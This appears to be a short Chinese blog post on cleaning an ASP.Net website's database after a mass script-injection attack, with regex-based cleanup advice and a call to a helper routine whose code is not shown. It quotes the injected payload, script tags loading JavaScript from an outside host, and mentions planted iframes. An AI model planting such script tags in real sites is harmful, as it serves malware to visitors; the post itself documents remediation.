ASP.Net网站数据库被挂马后手动清除一例
网站环境:
ASP.Net
?
感染现象:
1、数据库中数据被黑客严重破坏,并对大量数据字段写入代码例如:
uploadpic/dm/2006213164850.jpg<script src=http://99j4.org/0.js></script><script src=http://99j4.org/0.js></script><script src=http://99j4.org/0.js></script>
?
2、网站中大多数的ASP页面被植入带有木马的网址<iframe ......></iframe>等
?
分析:数据库中大多数的数据都是在原始数据后添加了一段脚本可以用正则表达式将这代码过滤后再重新写入数据库。
当然如果数据量小的话就不用再写程序来处理了,直接从数据库中删除木马代码即可。^_^
再将数据库网站中的ASP页面用杀马工具进行查杀
?
下边写了一段代码,可以对数据库中被感染数据进行清理
?
代码调用:
//VirusExp.updateTable("主键","被挂马的字段名","表名");VirusExp.updateTable("v_id","v_url","v_videoinfo");VirusExp.updateTable("v_id","v_pic","v_videoinfo");?
网页挂马清除工具可以用飞盾
?
仅供参考,如果哪位有更好的办法欢迎拿出来共享
?
